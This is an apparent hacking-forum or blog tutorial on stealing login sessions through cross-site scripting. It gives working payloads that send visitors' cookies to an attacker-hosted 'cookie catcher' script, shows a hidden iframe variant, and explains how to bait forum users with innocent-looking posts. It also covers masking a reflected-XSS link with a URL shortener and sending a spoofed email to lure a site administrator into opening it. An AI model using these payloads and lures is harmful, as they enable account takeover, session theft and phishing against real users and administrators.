Hi XSS is in 2 ways, Persistent and Non-Persistent type.
For XSS we will use something called a cookie catcher. Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking
First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.
Cookie Catcher: http://adf.ly/Tdbm
What does the cookie catcher do?
It grabs the user's:
•Cookies
•IP
•Referral link which what page it got to that link
•Time and Date
Get Vulnerable sites:
Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
http://adf.ly/Tdo3
Now for testing if a site is vuln or not you can add these codes:
Code:
<script>alert(document.cookie)</script>
Code:
<script>alert(document.cookie)</script>
Code:
<script>alert("Test")</script>
Code:
<script>alert("Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
<body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>
Then if we see a java script popup like this:
Or if you used my testing and you saw the page's background go black or
a page of google opens in that site means its vulnerable to XSS
attacks.
In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id= "><script>alert(document.cookie)</script>
[size=11]Persistent XSS:
In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: http://adf.ly/Tdo3
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now
lets try to grab it's cookies. If there is a box to type and submit it
add this:
Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box also its good to
add something before adding the code like: hey i got a problem logging
in??? so they wont suspect you
Refresh the page, now go to the
newly created page, in the same directory as you saved your cookie
catcher .php search for cookies.html which is a new file that show you
the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html
Now visit cookies.html and you would see the session of that cookie!
PS: the site i used doesn't support cookies so you can use: http://adf.ly/TeZV for cookie supporting.
Now there is another way for a cookie grabbing drive by, add this code and post it:
Code:
<iframe frameborder=0 height=0 width=0
src=javascript:void(document.location="www.you.110mb.com/cookie
catcher.php?c=" + document.cookie)</iframe>
Then post it
in the forum or the comment box.Now this will open a iframe in the page
which will allow you to have the same page in that website. If you don't
know about iframes make a new html file in your computer and just do a
<iframe src="www.google.com"></iframe> and you will understand iframes more
of the site Needs to have cookies supported! a blank javascript means you need to go to another site.
Non-Persistent XSS:
Ok in this method we will make the victim admin go to our link. First
we will pick a XSS vuln site. For this method we will need a search.php
which that page is vuln to XSS and has cookies in that page. In the vuln
search.php in the textbox for the word to search for type:
Code:
<script>alert(document.cookie)</script>
and click the search button. If you see a javascript popup means its
vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to http://www.tinyurl.com
and shrink the whole page's link. Try to find a site administrator's
E-mail in that vuln website and send a Fake Mail from a online fake
mailer like this one:
http://hackcommunity.com/Thread-Anonymou...to-any-any
Now in the body just tell something fake like: Hey i found a huge bug
in your website! and give him the shrinked link of the search.php which
you added the code in front of it to him. so the Tinyurl will mask it
and once he goes to the link you will see his cookies in your
cookies.html and he will just be redirected to the link in your cookies
catcher. No matter what he does and changes his password you can still
login as him
No comments:
Post a Comment